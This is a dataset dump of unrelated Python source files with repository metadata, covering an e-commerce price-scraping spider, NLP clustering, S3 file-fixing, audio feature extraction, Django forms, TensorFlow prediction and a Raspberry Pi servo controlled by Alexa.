+{"seq_id": "20538236857", "text": "# -*- coding: utf-8 -*-\r\nfrom scrapy.spider import BaseSpider\r\nfrom scrapy.selector import HtmlXPathSelector\r\nfrom scrapy.http import Request\r\nfrom scrapy.utils.response import get_base_url\r\nfrom urlparse import urljoin\r\nfrom product_spiders.items import Product, ProductLoader\r\nfrom product_spiders.utils import extract_price\r\nfrom urlparse import urljoin as urljoin_rfc\r\nfrom scrapy import signals\r\nfrom scrapy.xlib.pydispatch import dispatcher\r\nfrom scrapy.exceptions import DontCloseSpider\r\n\r\n\r\nclass OncallmedicalsuppliesSpider(BaseSpider):\r\n name = u'oncallmedicalsupplies.co.uk'\r\n allowed_domains = ['www.oncallmedicalsupplies.co.uk']\r\n start_urls = [\r\n u'http://www.oncallmedicalsupplies.co.uk',\r\n ]\r\n #download_delay = 1\r\n\r\n def __init__(self, *args, **kwargs):\r\n super(OncallmedicalsuppliesSpider, self).__init__(*args, **kwargs)\r\n dispatcher.connect(self.process_subcategories, signals.spider_idle)\r\n\r\n self.subcategories = []\r\n\r\n def process_subcategories(self, spider):\r\n if spider.name == self.name:\r\n self.log(\"Spider idle. Processing subcategories\")\r\n url = None\r\n if self.subcategories:\r\n url = self.subcategories.pop(0)\r\n if url:\r\n r = Request(url, callback=self.parse_subcategories)\r\n self._crawler.engine.crawl(r, self)\r\n raise DontCloseSpider\r\n\r\n def parse(self, response):\r\n hxs = HtmlXPathSelector(response)\r\n base_url = get_base_url(response)\r\n # subcategories\r\n urls = hxs.select('//div[@class=\"nav-container\"]//ul[@class=\"nav-horizontal\"]/li[position() > 1 and position() < 7]//a/@href').extract()\r\n for url in urls:\r\n url = urljoin_rfc(base_url, url)\r\n if url not in self.subcategories:\r\n self.subcategories.append(url)\r\n #yield Request(urljoin_rfc(base_url, url), callback=self.parse_subcategories)\r\n\r\n brand_list = \"http://www.oncallmedicalsupplies.co.uk/brands/\"\r\n yield Request(brand_list, callback=self.parse_brand_list)\r\n\r\n def parse_brand_list(self, response):\r\n hxs = HtmlXPathSelector(response)\r\n base_url = get_base_url(response)\r\n\r\n urls = response.xpath('//ul[@id=\"manufacturer_list\"]//a/@href').extract()\r\n for url in urls:\r\n url = urljoin_rfc(base_url, url)\r\n if url not in self.subcategories:\r\n self.subcategories.append(url)\r\n\r\n\r\n def parse_subcategories(self, response):\r\n hxs = HtmlXPathSelector(response)\r\n base_url = get_base_url(response)\r\n # subcategories\r\n urls = hxs.select('//*[@id=\"narrow-by-list2\"]//a/@href').extract()\r\n for url in urls:\r\n url = urljoin_rfc(base_url, url)\r\n if url not in self.subcategories:\r\n self.subcategories.append(url)\r\n #yield Request(urljoin_rfc(base_url, url), callback=self.parse_subcategories)\r\n urls = hxs.select('//div[@class=\"category-description std\"]/table//a/@href').extract()\r\n for url in urls:\r\n url = urljoin_rfc(base_url, url)\r\n if url not in self.subcategories:\r\n self.subcategories.append(url)\r\n #yield Request(urljoin_rfc(base_url, url), callback=self.parse_subcategories)\r\n #pagination\r\n urls = hxs.select('//div[@class=\"pages\"]//a/@href').extract()\r\n for url in urls:\r\n yield Request(urljoin_rfc(base_url, url), callback=self.parse_subcategories)\r\n # products\r\n urls = hxs.select('//div[@class=\"category-products\"]//h2/a/@href').extract()\r\n for url in urls:\r\n yield Request(urljoin_rfc(base_url, url), callback=self.parse_product)\r\n\r\n def parse_product(self, response):\r\n hxs = HtmlXPathSelector(response)\r\n base_url = get_base_url(response)\r\n for url in response.xpath('//div[@class=\"grouped_mini_name\"]/a/@href').extract():\r\n yield Request(url, callback=self.parse_product)\r\n loader = ProductLoader(item=Product(), selector=hxs)\r\n name = hxs.select('//h1[@itemprop=\"name\"]/text()').extract()[0].strip()\r\n loader.add_value('url', response.url)\r\n loader.add_value('name', name)\r\n image_url = hxs.select('//img[@id=\"image\"]/@src').extract()\r\n if image_url:\r\n loader.add_value('image_url', urljoin(base_url, image_url[0]))\r\n identifier = response.xpath('//*[@id=\"product_addtocart_form\"]//input[@name=\"product\"]/@value').extract()[0].strip()\r\n price = 0\r\n availability = hxs.select('//span[@itemprop=\"availability\"]/@content').extract()\r\n if availability:\r\n if availability[0].strip() == 'out_of_stock':\r\n loader.add_value('stock', 0)\r\n else:\r\n price = response.xpath('//span[@id=\"price-excluding-tax-%s\"]//text()' %identifier).extract()\r\n if price:\r\n price = extract_price(price[0])\r\n else:\r\n return\r\n loader.add_value('price', price)\r\n category = hxs.select('//div[@class=\"breadcrumbs\"]/ul/li[2]/a/text()').extract()\r\n if category:\r\n loader.add_value('category', category[-1])\r\n sku = hxs.select('//span[@itemprop=\"identifier\"]/text()').extract()[0]\r\n loader.add_value('sku', sku)\r\n loader.add_value('identifier', identifier)\r\n brand = hxs.select('//span[@itemprop=\"brand\"]/text()').extract()\r\n if brand:\r\n loader.add_value('brand', brand[0])\r\n yield loader.load_item()\r\n", "repo_name": "Godsoo/scraping", "sub_path": "e-commerce/CompetitorMonitor/product_spiders/spiders/farla/oncallmedicalsupplies.py", "file_name": "oncallmedicalsupplies.py", "file_ext": "py", "file_size_in_byte": 5630, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "scrapy.spider.BaseSpider", "line_number": 15, "usage_type": "name"}, {"api_name": "scrapy.xlib.pydispatch.dispatcher.connect", "line_number": 25, "usage_type": "call"}, {"api_name": "scrapy.xlib.pydispatch.dispatcher", "line_number": 25, "usage_type": "name"}, {"api_name": "scrapy.signals.spider_idle", "line_number": 25, "usage_type": "attribute"}, {"api_name": "scrapy.signals", "line_number": 25, "usage_type": "name"}, {"api_name": "scrapy.http.Request", "line_number": 36, "usage_type": "call"}, {"api_name": "scrapy.exceptions.DontCloseSpider", "line_number": 38, "usage_type": "name"}, {"api_name": "scrapy.selector.HtmlXPathSelector", "line_number": 41, "usage_type": "call"}, {"api_name": "scrapy.utils.response.get_base_url", "line_number": 42, "usage_type": "call"}, {"api_name": "urlparse.urljoin", "line_number": 46, "usage_type": "call"}, {"api_name": "scrapy.http.Request", "line_number": 52, "usage_type": "call"}, {"api_name": "scrapy.selector.HtmlXPathSelector", "line_number": 55, "usage_type": "call"}, {"api_name": "scrapy.utils.response.get_base_url", "line_number": 56, "usage_type": "call"}, {"api_name": "urlparse.urljoin", "line_number": 60, "usage_type": "call"}, {"api_name": "scrapy.selector.HtmlXPathSelector", "line_number": 66, "usage_type": "call"}, {"api_name": "scrapy.utils.response.get_base_url", "line_number": 67, "usage_type": "call"}, {"api_name": "urlparse.urljoin", "line_number": 71, "usage_type": "call"}, {"api_name": "urlparse.urljoin", "line_number": 77, "usage_type": "call"}, {"api_name": "scrapy.http.Request", "line_number": 84, "usage_type": "call"}, {"api_name": "urlparse.urljoin", "line_number": 84, "usage_type": "call"}, {"api_name": "scrapy.http.Request", "line_number": 88, "usage_type": "call"}, {"api_name": "urlparse.urljoin", "line_number": 88, "usage_type": "call"}, {"api_name": "scrapy.selector.HtmlXPathSelector", "line_number": 91, "usage_type": "call"}, {"api_name": "scrapy.utils.response.get_base_url", "line_number": 92, "usage_type": "call"}, {"api_name": "scrapy.http.Request", "line_number": 94, "usage_type": "call"}, {"api_name": "product_spiders.items.ProductLoader", "line_number": 95, "usage_type": "call"}, {"api_name": "product_spiders.items.Product", "line_number": 95, "usage_type": "call"}, {"api_name": "urlparse.urljoin", "line_number": 101, "usage_type": "call"}, {"api_name": "product_spiders.utils.extract_price", "line_number": 111, "usage_type": "call"}]}
+{"seq_id": "26736930107", "text": "import numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nfrom nltk.tokenize import word_tokenize\r\nfrom nltk.tokenize import sent_tokenize\r\nfrom bs4 import BeautifulSoup\r\nimport requests\r\nimport re\r\nfrom collections import Counter \r\ndef url_to_string(url):\r\n res = requests.get(url)\r\n html = res.text\r\n soup = BeautifulSoup(html, 'html5lib')\r\n for script in soup([\"script\", \"style\", 'aside']):\r\n script.extract()\r\n return \" \".join(re.split(r'[\\n\\t]+', soup.get_text()))\r\n\r\n#ny_bb = url_to_string('https://www.nytimes.com/2018/08/13/us/politics/peter-strzok-fired-fbi.html?hp&action=click&pgtype=Homepage&clickSource=story-heading&module=first-column-region®ion=top-news&WT.nav=top-news')\r\n\r\np_num=1\r\n\r\nlist_file_path = [r\"D:\\DS\\NLP\\Seminar\\Code Example\\Targil2\\Data Of Articles\\articles1.csv\",r\"D:\\DS\\NLP\\Seminar\\Code Example\\Targil2\\Data Of Articles\\articles2.csv\",r\"D:\\DS\\NLP\\Seminar\\Code Example\\Targil2\\Data Of Articles\\articles3.csv\"]\r\n\r\ndata = pd.DataFrame()\r\nfor i in list_file_path:\r\n temp_data = pd.read_csv(i)\r\n if data.shape[0] == 0:\r\n data = temp_data\r\n else:\r\n data = data.append(temp_data)\r\n \r\n\r\nmask_url_data = data['url'].notnull()\r\n\r\nurl_data = data.loc[mask_url_data,'url']\r\nurl_data = url_data.iloc[:20]\r\nnews_list = list()\r\nfor url in url_data:\r\n text = url_to_string(url)\r\n news_list.append(sent_tokenize(text))\r\n\r\n\r\n#%% Word To Vec\r\n#Input to the gensim's Word2Vec can be a list of sentences or list of words or list of list of sentences.\r\nfrom gensim.models import Word2Vec\r\nsentences = news_list\r\nmodel = Word2Vec(sentences, size=100, window=5, min_count=3, workers=4)\r\n\r\nvectors = model.wv\r\n#%%Plot Word Vectors Using PCA\r\nfrom sklearn.decomposition import PCA\r\n\r\nX = model[model.wv.vocab]\r\npca = PCA(n_components=2)\r\nresult = pca.fit_transform(X)\r\nplt.figure(p_num)\r\nplt.scatter(result[:, 0], result[:, 1])\r\n#words = list(model.wv.vocab)\r\nwords = [i for i in range(0,len(sentences))]\r\nfor i, word in enumerate(words):\r\n\tplt.annotate(word, xy=(result[i, 0], result[i, 1]))\r\nplt.show()\r\np_num+=1\r\n\r\n#%% cluster\r\nvocab_list = words\r\nX = model[model.wv.vocab]\r\n\r\nfrom nltk.cluster import KMeansClusterer\r\nimport nltk\r\nnum_clusters=2\r\nkclusterer = KMeansClusterer(num_clusters, distance=nltk.cluster.util.cosine_distance, repeats=25)\r\nassigned_clusters = kclusterer.cluster(X, assign_clusters=True)\r\nprint (assigned_clusters)\r\n\r\ncluster_dataframe = pd.DataFrame({'cluster':assigned_clusters},index = vocab_list)\r\n\r\nmask = cluster_dataframe['cluster']==0\r\n\r\ncluster_dataframe[mask]\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n", "repo_name": "talrozner/my-repository", "sub_path": "NLP/test/Pitaron - Cluster Of News.py", "file_name": "Pitaron - Cluster Of News.py", "file_ext": "py", "file_size_in_byte": 2608, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "requests.get", "line_number": 11, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 13, "usage_type": "call"}, {"api_name": "re.split", "line_number": 16, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 24, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 26, "usage_type": "call"}, {"api_name": "nltk.tokenize.sent_tokenize", "line_number": 40, "usage_type": "call"}, {"api_name": "gensim.models.Word2Vec", "line_number": 47, "usage_type": "call"}, {"api_name": "sklearn.decomposition.PCA", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.annotate", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}, {"api_name": "nltk.cluster.KMeansClusterer", "line_number": 72, "usage_type": "call"}, {"api_name": "nltk.cluster", "line_number": 72, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 76, "usage_type": "call"}]}
+{"seq_id": "2165582588", "text": "\"\"\"\n\nUsage:\n scripts/oneoff/fix-agreement-extensions.py [--dry-run]\n\"\"\"\nimport sys\nsys.path.insert(0, '.')\n\nimport os\nimport re\n\nimport magic\nfrom docopt import docopt\n\nfrom dmapiclient import DataAPIClient\nfrom dmutils.s3 import S3\nfrom dmscripts.env import get_api_endpoint_from_stage\n\n\ndef get_all_pdfs(download_directory):\n for root, subfolder, files in os.walk(download_directory):\n for filename in files:\n if filename.endswith('.pdf') and not filename.startswith('2015-11-'):\n yield os.path.join(root, filename)\n\n\ndef get_filetype(path):\n return magic.from_file(path, mime=True)\n\n\ndef is_empty(path):\n stat = os.stat(path)\n return stat.st_size == 0\n\n\ndef get_supplier_id_from_path(path):\n match = re.search(r'/(\\d+)/', path)\n if not match:\n raise ValueError(\"Could not find supplier ID in path {}\".format(path))\n return match.group(1)\n\n\ndef handle_path(client, bucket, dry_run, path):\n if is_empty(path):\n show_contact_details(client, dry_run, path)\n else:\n filetype = get_filetype(path)\n if filetype != b\"application/pdf\":\n update_file_extension(client, bucket, dry_run, path, filetype)\n\n\ndef show_contact_details(client, dry_run, path):\n supplier_id = get_supplier_id_from_path(path)\n if dry_run:\n print(\"Empty file for {} - {}\".format(supplier_id, os.path.basename(path)))\n else:\n supplier = client.get_supplier(supplier_id)['suppliers']\n declaration = client.get_supplier_declaration(supplier_id, 'g-cloud-7')\n print(\n \"Empty file for {}, {}, {}, {}\".format(\n supplier_id,\n supplier['name'],\n declaration['declaration'].get('SQ1-2b', \"none\"),\n supplier['contactInformation'][0]['email']))\n\n\ndef get_correct_file_extension(filetype):\n extension = {\n b\"application/zip\": \"zip\",\n b\"image/png\": \"png\",\n b\"image/jpeg\": \"jpg\",\n b'application/vnd.openxmlformats-officedocument.wordprocessingml.document': 'docx',\n }.get(filetype)\n if not extension:\n raise ValueError(\"Unknown file type: {}\".format(filetype))\n return extension\n\n\ndef get_path_in_s3(path):\n return \"{}/{}\".format('g-cloud-7', path.split('/g-cloud-7/')[1])\n\n\ndef update_file_extension(client, bucket, dry_run, path, filetype):\n supplier_id = get_supplier_id_from_path(path)\n extension = get_correct_file_extension(filetype)\n path_in_s3 = get_path_in_s3(path)\n prefix, suffix = os.path.splitext(path_in_s3)\n new_path = \"{}.{}\".format(prefix, extension)\n if dry_run:\n print(\n \"Not copying {} to {} for supplier {}\".format(\n path_in_s3, new_path, supplier_id))\n else:\n print(\n \"Copying {} to {} for supplier {} filetype {}\".format(\n path_in_s3, new_path, supplier_id, filetype))\n bucket.bucket.copy_key(\n new_path,\n src_bucket_name=bucket.bucket_name,\n src_key_name=path_in_s3,\n metadata={'Content-Type': filetype.decode('utf-8')},\n preserve_acl=True,\n )\n client.register_framework_agreement_returned(\n supplier_id,\n 'g-cloud-7',\n 'script: fix incorrect extension'\n )\n\n\ndef get_bucket_name(stage):\n return 'digitalmarketplace-agreements-{0}-{0}'.format(stage)\n\nif __name__ == '__main__':\n arguments = docopt(__doc__)\n\n stage = arguments['']\n api_token = arguments['']\n download_directory = arguments['']\n dry_run = arguments['--dry-run']\n\n api_url = get_api_endpoint_from_stage(stage)\n\n if dry_run:\n client = None\n bucket = None\n else:\n client = DataAPIClient(api_url, api_token)\n bucket = S3(get_bucket_name(stage))\n\n for path in get_all_pdfs(download_directory):\n handle_path(client, bucket, dry_run, path)\n", "repo_name": "risicle/digitalmarketplace-scripts", "sub_path": "scripts/oneoff/fix-agreement-extensions.py", "file_name": "fix-agreement-extensions.py", "file_ext": "py", "file_size_in_byte": 3980, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "32", "api": [{"api_name": "sys.path.insert", "line_number": 7, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "magic.from_file", "line_number": 28, "usage_type": "call"}, {"api_name": "os.stat", "line_number": 32, "usage_type": "call"}, {"api_name": "re.search", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path", "line_number": 55, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "docopt.docopt", "line_number": 115, "usage_type": "call"}, {"api_name": "dmscripts.env.get_api_endpoint_from_stage", "line_number": 122, "usage_type": "call"}, {"api_name": "dmapiclient.DataAPIClient", "line_number": 128, "usage_type": "call"}, {"api_name": "dmutils.s3.S3", "line_number": 129, "usage_type": "call"}]}
+{"seq_id": "69986959133", "text": "import os\nimport platform\n\n_scale = {'kB': 1024, 'mB': 1024*1024,\n 'KB': 1024, 'MB': 1024*1024}\n\ndef resident():\n if platform.system() == 'Windows':\n from wmi import WMI\n w = WMI('.')\n result = w.query(\"SELECT WorkingSet FROM Win32_PerfRawData_PerfProc_Process WHERE IDProcess=%d\" % os.getpid())\n return int(result[0].WorkingSet)\n else:\n with open('/proc/%d/status' % os.getpid()) as f:\n v = f.read()\n i = v.index('VmRSS:')\n v = v[i:].split(None, 3)\n #assert len(v) == 3, v\n return float(v[1]) * _scale[v[2]]\n", "repo_name": "p2pool/p2pool", "sub_path": "p2pool/util/memory.py", "file_name": "memory.py", "file_ext": "py", "file_size_in_byte": 592, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1095, "dataset": "github-code", "pt": "32", "api": [{"api_name": "platform.system", "line_number": 8, "usage_type": "call"}, {"api_name": "wmi.WMI", "line_number": 10, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 11, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 14, "usage_type": "call"}]}
+{"seq_id": "31321871179", "text": "# -*- coding: UTF-8 -*-\nimport re\nimport numpy as np\nimport scipy as sp\nimport scipy.stats\n\n\"\"\"parse percentage string to float\"\"\"\ndef percentage_to_float(percentage_str):\n\tif percentage_str is None:\n\t\treturn 0.0\n\treturn float(re.search(r'[\\d\\.]+', percentage_str).group()) * 0.01\n\n\"\"\"compute data's mean confidence interval,\nmean difference will also be returned.\"\"\"\ndef mean_confidence_interval(data, confidence=0.95):\n\ta = 1.0 * np.array(data)\n\tn = len(a)\n\tif n < 1: return -1, -1, -1\n\tm, se = np.mean(a), scipy.stats.sem(a)\n\th = se * sp.stats.t._ppf((1 + confidence) / 2.0, n-1)\n\treturn m, m-h, m+h\n\n\"\"\"self defined loss function\"\"\"\ndef mean_loss_percentage(ground_truth, predictions):\n\treturn np.mean(np.abs((ground_truth - predictions) / predictions))", "repo_name": "hezudaopp/used_car_prediction", "sub_path": "utils/math_utils.py", "file_name": "math_utils.py", "file_ext": "py", "file_size_in_byte": 757, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "re.search", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 19, "usage_type": "call"}, {"api_name": "scipy.stats.sem", "line_number": 19, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 19, "usage_type": "attribute"}, {"api_name": "scipy.stats.t._ppf", "line_number": 20, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 20, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 25, "usage_type": "call"}]}
+{"seq_id": "26024898045", "text": "import os\r\nfrom python_speech_features import mfcc\r\nimport scipy.io.wavfile as wav\r\nimport numpy as np\r\nimport pickle\r\n\r\ndirectory = os.getcwd() + \"/features\"\r\nf = open(\"features.dmp\", \"wb\")\r\ni = 0\r\n\r\nfor folder in os.listdir(directory):\r\n print(folder, end=' ')\r\n i+=1\r\n if i == 11: \r\n break\r\n for file in os.listdir(directory+\"/\"+folder):\r\n (rate, sig) = wav.read(directory+\"/\"+folder+\"/\"+file)\r\n mfcc_feat = mfcc(sig, rate, winlen=0.02, winstep=0.01, numcep=15,nfft = 1200, appendEnergy=False) \r\n covariance = np.cov(np.matrix.transpose(mfcc_feat))\r\n mean_matrix = mfcc_feat.mean(0)\r\n feature = (mean_matrix , covariance , i)\r\n pickle.dump(feature , f)\r\n print(\"--- done ({}/10)\".format(i))\r\nf.close()\r\nprint(\"---- feature dump finished ----\")", "repo_name": "prateekbose/Music-Genre-Classification", "sub_path": "feature_dump.py", "file_name": "feature_dump.py", "file_ext": "py", "file_size_in_byte": 812, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "os.getcwd", "line_number": 7, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 11, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 16, "usage_type": "call"}, {"api_name": "scipy.io.wavfile.read", "line_number": 17, "usage_type": "call"}, {"api_name": "scipy.io.wavfile", "line_number": 17, "usage_type": "name"}, {"api_name": "python_speech_features.mfcc", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.cov", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.matrix.transpose", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.matrix", "line_number": 19, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 22, "usage_type": "call"}]}
+{"seq_id": "22380760325", "text": "'''\nForms\n'''\nfrom django import forms\nfrom .models import Comment, Post\n\n\nclass CommentForm(forms.ModelForm):\n '''\n Form for user to leave comments to the post\n '''\n class Meta:\n '''\n Comment only\n '''\n model = Comment\n fields = ('body',)\n labels = {'body': 'Comment:'}\n\n\nclass CreatePostForm(forms.ModelForm):\n '''\n Create new post\n '''\n\n class Meta:\n '''\n Form details\n '''\n model = Post\n fields = ('title', 'country', 'excerpt', 'featured_image', 'content', )\n labels = {'excerpt': 'Short Description'}\n", "repo_name": "kkwong44/travelogue", "sub_path": "blog/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 615, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.forms.ModelForm", "line_number": 8, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 8, "usage_type": "name"}, {"api_name": "models.Comment", "line_number": 16, "usage_type": "name"}, {"api_name": "django.forms.ModelForm", "line_number": 21, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 21, "usage_type": "name"}, {"api_name": "models.Post", "line_number": 30, "usage_type": "name"}]}
+{"seq_id": "31215379290", "text": "import random\nimport os\nimport numpy as np\nimport tensorflow as tf\n\nfrom google.cloud import storage\nfrom PIL import Image\n\nbucket_name = 'nugaskuy' \ndataset_dir = 'dataset'\n\n\n# def load_and_run_tflite_model(input_data):\n# # Load the TFLite model\n# interpreter = tf.lite.Interpreter(model_path='https://storage.googleapis.com/nugaskuy/modelv2.tflite')\n# interpreter.allocate_tensors()\n\n# # Get input and output details\n# input_details = interpreter.get_input_details()\n# output_details = interpreter.get_output_details()\n\n# # Set input data\n# interpreter.set_tensor(input_details[0]['index'], input_data)\n\n# # Run the interpreter\n# interpreter.invoke()\n\n# # Get the output results\n# output_data = interpreter.get_tensor(output_details[0]['index'])\n\n# return output_data\n\ndef get_recommended_images(category, num_images):\n # Membuat objek storage client\n storage_client = storage.Client()\n\n # Mendapatkan objek bucket\n bucket = storage_client.get_bucket(bucket_name)\n\n # Mendapatkan daftar file dalam direktori kategori di bucket\n category_dir = os.path.join(dataset_dir, category)\n blobs = bucket.list_blobs(prefix=category_dir + '/')\n\n # Mengambil nama file dari daftar blobs\n image_files = [blob.name for blob in blobs]\n\n # Jika ada lebih sedikit gambar daripada yang diminta\n num_images = min(num_images, len(image_files))\n\n # Memilih gambar secara acak\n recommended_images = random.sample(image_files, num_images)\n\n # Mengembalikan daftar URL publik untuk gambar yang direkomendasikan\n return [f\"https://storage.googleapis.com/{bucket_name}/{image_file}\" for image_file in recommended_images]\n # return recommended_images\n\ndef load_and_predict(image):\n img_size = 224\n model = tf.keras.models.load_model('gs://nugaskuy/model.h5')\n\n try:\n # Setup Image untuk kebutuhan prediksi\n img = Image.open(image)\n img = img.convert(\"RGB\")\n img = img.resize((img_size, img_size))\n img_array = np.array(img) / 255.0\n img_array = img_array[np.newaxis, ...]\n img_array = img_array.astype(np.float32)\n\n # Melakukan prediksi\n# prediction = load_and_run_tflite_model(img_array)\n prediction = model.predict(img_array)\n predicted_class = np.argmax(prediction)\n\n categories = [\"logaritma\", \"spldv\", \"integral\", \"pertidaksamaan\", \"eksponen\"]\n # Ubah class menjadi categorie\n predict_categories = categories[predicted_class]\n\n return predicted_class, predict_categories\n\n except OSError:\n return None, None\n", "repo_name": "ZamIzzudin/nugaskuy-be-flask", "sub_path": "controllers/logic.py", "file_name": "logic.py", "file_ext": "py", "file_size_in_byte": 2613, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "google.cloud.storage.Client", "line_number": 35, "usage_type": "call"}, {"api_name": "google.cloud.storage", "line_number": 35, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "random.sample", "line_number": 51, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 59, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 59, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 63, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 63, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 67, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 68, "usage_type": "attribute"}, {"api_name": "numpy.argmax", "line_number": 73, "usage_type": "call"}]}
+{"seq_id": "2891376692", "text": "#!/usr/bin/env python\n\"\"\"Some test application\n\"\"\"\nfrom config import Config\nfrom engine import py_engine\nfrom localtime import py_now_local\n\n\ndef main():\n conf = Config()\n result = py_engine(conf.content)\n print(py_now_local())\n print(result)\n print()\n print(\"The question in config file was:\", result[\"response\"][\"the_question_was\"])\n print(\"Response:\", result[\"response\"][\"answer\"])\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "abilian/cythonplus-sandbox", "sub_path": "advanced_containers/demo/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 447, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "32", "api": [{"api_name": "config.Config", "line_number": 10, "usage_type": "call"}, {"api_name": "engine.py_engine", "line_number": 11, "usage_type": "call"}, {"api_name": "localtime.py_now_local", "line_number": 12, "usage_type": "call"}]}
+{"seq_id": "28090481692", "text": "from datetime import datetime\nimport datetime\nfrom astral.sun import sun\nfrom astral import LocationInfo\n\nfrom pysolar.solar import*\n\nimport RPi.GPIO as GPIO\nimport pigpio\nimport time\n\nfrom flask import Flask\nfrom flask_ask import Ask, statement, convert_errors\nimport logging\n\nfrom multiprocessing import Process, Value\n\nimport requests\n\nGPIO.setmode(GPIO.BCM)\n\n#LimitSwitchShut = 16\n#LimitSwitchOpen = 12\n#GPIO.setup(LimitSwitchShut, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n#GPIO.setup(LimitSwitchOpen, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n\nservo = 23\n#using pigpio for accurate hardware based timing rather than software generated which is susceptible to jitter\n\npwm = pigpio.pi() \npwm.set_mode(servo, pigpio.OUTPUT)\npwm.set_PWM_frequency( servo, 50 )\n\ndef get_elevation():\n date = datetime.datetime.now()\n LAT = \"REMOVED FOR PRIVACY\"\n LON = \"REMOVED FOR PRIVACY\"\n location = LocationInfo(\"Home\",\"England\",\"GMT\",LAT,LON)\n \n sun_times = sun(location.observer, date = date)\n\n dawn=sun_times[\"dawn\"]\n dusk=sun_times[\"dusk\"]\n dawn_elevation=get_altitude(LAT,LON,dawn)\n dusk_elevation=get_altitude(LAT,LON,dusk)\n #print(dawn_elevation)\n\n now = datetime.datetime.now(datetime.timezone.utc)\n #now=datetime.datetime(2007,2,18,12,13,1,190320,tzinfo=datetime.timezone.utc)\n current_elevation = get_altitude(LAT,LON,now)\n return current_elevation, dawn_elevation, dusk_elevation\n\napp = Flask(__name__)\nask = Ask(app, '/')\n\n#logging.getLogger(\"flask_ask\").setLevel(logging.DEBUG)\n\n@ask.intent('CONTROL_Intent', mapping={'status': 'status'})\ndef gpio_control(status):\n if status == \"open\":\n \n pwm.set_servo_pulsewidth( servo, 2500 ) ;\n time.sleep(2)\n pwm.set_PWM_dutycycle(servo,0);\n #else:\n #pwm.set_PWM_dutycycle(servo, 0);\n if status == 'close':\n pwm.set_servo_pulsewidth( servo, 500 ) ;\n time.sleep(2)\n\n#else:\n pwm.set_PWM_dutycycle(servo, 0);\n #GPIO.setup(pinNum, GPIO.OUT)\n #if status in ['on', 'high']: GPIO.output(pinNum, GPIO.HIGH)\n #if status in ['off', 'low']: GPIO.output(pinNum, GPIO.LOW)\n #return statement('Turning pin {} {}'.format(pin, status))\n #print(status)\n #time.sleep(1)\n return statement('Sensing and IoT is super epic.')\n\"\"\"\ndef automate(status):\n while True:\n if status == \"close\":\n status.value = True\n if status == \"open\":\n status.value = False\n \n 